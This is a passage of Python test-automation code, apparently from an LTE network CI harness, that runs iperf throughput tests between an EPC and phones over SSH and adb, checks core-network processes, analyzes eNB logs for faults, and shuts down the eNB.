if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) (\((?P<packetloss>[0-9\.]+)%\))', str(self.ssh.before))
if result is not None:
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
jitter = result.group('jitter')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
iperfStatus = True
msg = 'Req Bitrate : ' + req_bandwidth + '\n'
logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
if bitrate is not None:
msg += 'Bitrate : ' + bitrate + '\n'
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
if result is not None:
actual_bw = float(str(result.group('real_bw')))
result = re.search('[0-9\.]+ K', bitrate)
if result is not None:
actual_bw = actual_bw * 1000
result = re.search('[0-9\.]+ M', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000
result = re.search('[0-9\.]+ G', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000000
br_loss = 100 * actual_bw / req_bw
bitperf = '%.2f ' % br_loss
msg += 'Bitrate Perf: ' + bitperf + '%\n'
logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
if packetloss is not None:
msg += 'Packet Loss : ' + packetloss + '%\n'
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
if float(packetloss) > float(self.iperf_packetloss_threshold):
msg += 'Packet Loss too high!\n'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
iperfStatus = False
if jitter is not None:
msg += 'Jitter : ' + jitter + '\n'
logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
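	# Fallback analysis from the server-side log: average the per-interval bitrate and jitter,
	# sum lost/sent packets, and flag the run when less than 90% of the requested bitrate is reached.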
def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
return
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is None:
logging.debug('Iperf bandwidth Not Found!')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
return
else:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
br_sum = 0.0
ji_sum = 0.0
pl_sum = 0
ps_sum = 0
row_idx = 0
for line in server_file.readlines():
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
if result is not None:
bitrate = result.group('bitrate')
jitter = result.group('jitter')
packetlost = result.group('lostPack')
packetsent = result.group('sentPack')
br = bitrate.split(' ')
ji = jitter.split(' ')
row_idx = row_idx + 1
curr_br = float(br[0])
pl_sum = pl_sum + int(packetlost)
ps_sum = ps_sum + int(packetsent)
if (br[1] == 'Kbits/sec'):
curr_br = curr_br * 1000
if (br[1] == 'Mbits/sec'):
curr_br = curr_br * 1000 * 1000
br_sum = curr_br + br_sum
ji_sum = float(ji[0]) + ji_sum
if (row_idx > 0):
br_sum = br_sum / row_idx
ji_sum = ji_sum / row_idx
br_loss = 100 * br_sum / req_bw
if (br_sum > 1000):
br_sum = br_sum / 1000
if (br_sum > 1000):
br_sum = br_sum / 1000
bitrate = '%.2f Mbits/sec' % br_sum
else:
bitrate = '%.2f Kbits/sec' % br_sum
else:
bitrate = '%.2f bits/sec' % br_sum
bitperf = '%.2f ' % br_loss
bitperf += '%'
jitter = '%.2f ms' % (ji_sum)
if (ps_sum > 0):
pl = float(100 * pl_sum / ps_sum)
packetloss = '%2.1f ' % (pl)
packetloss += '%'
else:
packetloss = 'unknown'
lock.acquire()
if (br_loss < 90):
statusQueue.put(1)
else:
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
req_msg = 'Req Bitrate : ' + req_bandwidth
bir_msg = 'Bitrate : ' + bitrate
brl_msg = 'Bitrate Perf: ' + bitperf
jit_msg = 'Jitter : ' + jitter
pal_msg = 'Packet Loss : ' + packetloss
statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
lock.release()
else:
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
server_file.close()
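	# iperf3 client analysis: parse the final summary line for bitrate and (UDP only) packet loss.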
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', str(self.ssh.before))
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', str(self.ssh.before))
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
			lock.release()
			# no parsable iperf3 report: stop here instead of dereferencing a missing match below
			return
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
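	# Uplink iperf (iperf2 only): start the server on the EPC (port 5001 + UE index), run the client
	# on the UE through adb with the "-R" flag stripped, and fall back to the server log on failure.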
def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
udpIperf = True
result = re.search('-u', str(self.iperf_args))
if result is None:
udpIperf = False
ipnumbers = UE_IPAddress.split('.')
if (len(ipnumbers) == 4):
ipnumbers[3] = '1'
EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
# Launch iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
port = 5001 + idx
if udpIperf:
self.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
else:
self.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
time.sleep(0.5)
self.close()
# Launch iperf client on UE
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
modified_options = modified_options.replace('-R','')
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
iperf_status = self.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee -a iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
# TIMEOUT Case
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('killall --signal SIGKILL iperf', self.EPCUserName, 5)
self.close()
# in case of failure, retrieve server log
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
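	# Per-UE iperf worker: detect iperf/iperf3 on the UE, route iperf2 "-R" runs to Iperf_UL_common,
	# otherwise start the server on the UE and the client on the EPC, then analyze and clean up.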
def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
try:
# Single-UE profile -- iperf only on one UE
if self.iperf_profile == 'single-ue' and idx != 0:
return
useIperf3 = False
udpIperf = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
self.command('if [ ! -d ' + self.EPCSourceCodePath + '/scripts ]; then mkdir -p ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
# Checking if iperf / iperf3 are installed
self.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
result = re.search('iperf3', str(self.ssh.before))
if result is None:
result = re.search('iperf', str(self.ssh.before))
if result is None:
message = 'Neither iperf nor iperf3 installed on UE!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
else:
useIperf3 = True
# in case of iperf, UL has its own function
if (not useIperf3):
result = re.search('-R', str(self.iperf_args))
if result is not None:
self.close()
self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
return
if (useIperf3):
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
time.sleep(0.5)
self.close()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (useIperf3):
self.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee -a iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
clientStatus = 0
self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
else:
iperf_status = self.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee -a iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Iperf(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
i = 0
ue_num = len(self.UEIPAddresses)
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = SSH.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.iperf_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
iperf_status = True
iperf_noperf = False
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
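	# Check in parallel that the HSS, MME, SPGW (and eNB, unless we are initializing it) processes
	# are still running; on an eNB failure, retrieve and analyze its log file.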
def CheckProcessExist(self, initialize_eNB_flag):
multi_jobs = []
status_queue = SimpleQueue()
p = Process(target = SSH.CheckHSSProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckMMEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckSPGWProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
if initialize_eNB_flag == False:
p = Process(target = SSH.CheckeNBProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == ENB_PROCESS_FAILED:
fileCheck = re.search('enb_', str(self.eNBLogFile))
if fileCheck is not None:
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFile, '.')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFile)
if logStatus < 0:
result = logStatus
return result
def CheckeNBProcess(self, status_queue):
try:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never lte-softmodem', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m eNB Process Not Found! \u001B[0m')
status_queue.put(ENB_PROCESS_FAILED)
else:
status_queue.put(ENB_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckHSSProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never hss', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('hss_sim s6as diam_hss', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m HSS Process Not Found! \u001B[0m')
status_queue.put(HSS_PROCESS_FAILED)
else:
status_queue.put(HSS_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckMMEProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never mme', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('mme', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m MME Process Not Found! \u001B[0m')
status_queue.put(MME_PROCESS_FAILED)
else:
status_queue.put(MME_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckSPGWProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never spgw', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never xGw', '\$', 5)
result = re.search('xGw', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m SPGW Process Not Found! \u001B[0m')
status_queue.put(SPGW_PROCESS_FAILED)
else:
status_queue.put(SPGW_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
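	# Scan the eNB log: count RRC/RACH/ULSCH/PDCP events, verify that command-line options were
	# applied, and return a negative status on segmentation faults, assertions or real-time issues.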
def AnalyzeLogFile_eNB(self, eNBlogFile):
if (not os.path.isfile('./' + eNBlogFile)):
return -1
enb_log_file = open('./' + eNBlogFile, 'r')
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
rrcSetupRequest = 0
rrcSetupComplete = 0
rrcReleaseRequest = 0
rrcReconfigRequest = 0
rrcReconfigComplete = 0
rrcReestablishRequest = 0
rrcReestablishComplete = 0
rrcReestablishReject = 0
rlcDiscardBuffer = 0
rachCanceledProcedure = 0
uciStatMsgCount = 0
pdcpFailure = 0
ulschFailure = 0
self.htmleNBFailureMsg = ''
for line in enb_log_file.readlines():
if self.rruOptions != '':
res1 = re.search('max_rxgain (?P<requested_option>[0-9]+)', self.rruOptions)
res2 = re.search('max_rxgain (?P<applied_option>[0-9]+)', str(line))
if res1 is not None and res2 is not None:
requested_option = int(res1.group('requested_option'))
applied_option = int(res2.group('applied_option'))
if requested_option == applied_option:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ok-circle"></span> Command line option(s) correctly applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.rruOptions + '\n\n'
else:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ban-circle"></span> Command line option(s) NOT applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.rruOptions + '\n\n'
result = re.search('[Ss]egmentation [Ff]ault', str(line))
if result is not None:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('Generating LTE_RRCConnectionSetup', str(line))
if result is not None:
rrcSetupRequest += 1
result = re.search('LTE_RRCConnectionSetupComplete from UE', str(line))
if result is not None:
rrcSetupComplete += 1
result = re.search('Generate LTE_RRCConnectionRelease', str(line))
if result is not None:
rrcReleaseRequest += 1
result = re.search('Generate LTE_RRCConnectionReconfiguration', str(line))
if result is not None:
rrcReconfigRequest += 1
result = re.search('LTE_RRCConnectionReconfigurationComplete from UE rnti', str(line))
if result is not None:
rrcReconfigComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentRequest', str(line))
if result is not None:
rrcReestablishRequest += 1
result = re.search('LTE_RRCConnectionReestablishmentComplete', str(line))
if result is not None:
rrcReestablishComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentReject', str(line))
if result is not None:
rrcReestablishReject += 1
result = re.search('uci->stat', str(line))
if result is not None:
uciStatMsgCount += 1
result = re.search('PDCP.*Out of Resources.*reason', str(line))
if result is not None:
pdcpFailure += 1
result = re.search('ULSCH in error in round', str(line))
if result is not None:
ulschFailure += 1
result = re.search('BAD all_segments_received', str(line))
if result is not None:
rlcDiscardBuffer += 1
result = re.search('Canceled RA procedure for UE rnti', str(line))
if result is not None:
rachCanceledProcedure += 1
enb_log_file.close()
if uciStatMsgCount > 0:
statMsg = 'eNB showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if pdcpFailure > 0:
statMsg = 'eNB showed ' + str(pdcpFailure) + ' "PDCP Out of Resources" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if ulschFailure > 0:
statMsg = 'eNB showed ' + str(ulschFailure) + ' "ULSCH in error in round" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if rrcSetupRequest > 0 or rrcSetupComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcSetupRequest) + ' RRC Connection Setup(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcSetupComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReleaseRequest > 0:
rrcMsg = 'eNB requested ' + str(rrcReleaseRequest) + ' RRC Connection Release(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReconfigRequest > 0 or rrcReconfigComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcReconfigRequest) + ' RRC Connection Reconfiguration(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReconfigComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReestablishRequest > 0 or rrcReestablishComplete > 0 or rrcReestablishReject > 0:
rrcMsg = 'eNB requested ' + str(rrcReestablishRequest) + ' RRC Connection Reestablishment(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishReject) + ' were rejected'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rachCanceledProcedure > 0:
rachMsg = 'eNB cancelled ' + str(rachCanceledProcedure) + ' RA procedure(s)'
logging.debug('\u001B[1;30;43m ' + rachMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rachMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m eNB ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;37;41m eNB ended with an assertion! \u001B[0m')
self.htmleNBFailureMsg += msgAssertion
return ENB_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m eNB faced real time issues! \u001B[0m')
self.htmleNBFailureMsg += 'eNB faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if rlcDiscardBuffer > 0:
rlcMsg = 'eNB RLC discarded ' + str(rlcDiscardBuffer) + ' buffer(s)'
logging.debug('\u001B[1;37;41m ' + rlcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rlcMsg + '\n'
return ENB_PROCESS_REALTIME_ISSUE
return 0
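	# Stop the lte-softmodem daemon (SIGINT, then SIGKILL if needed); when the T tracer was enabled,
	# also stop tshark on the EPC, retrieve the pcap and replay the raw record before analyzing the log.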
def TerminateeNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S daemon --name=enb' + str(self.eNB_instance) + '_daemon --stop', '\$', 5)
self.command('rm -f my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S killall --signal SIGINT lte-softmodem || true', '\$', 5)
time.sleep(5)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep lte-softmodem', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.eNBPassword + ' | sudo -S killall --signal SIGKILL lte-softmodem || true', '\$', 5)
time.sleep(5)
self.close()
# If tracer options is on, stopping tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
time.sleep(1)
pcap_log_file = self.eNBLogFile.replace('.log', '_s1log.pcap')
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + pcap_log_file, '\$', 5)
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + pcap_log_file, '.')
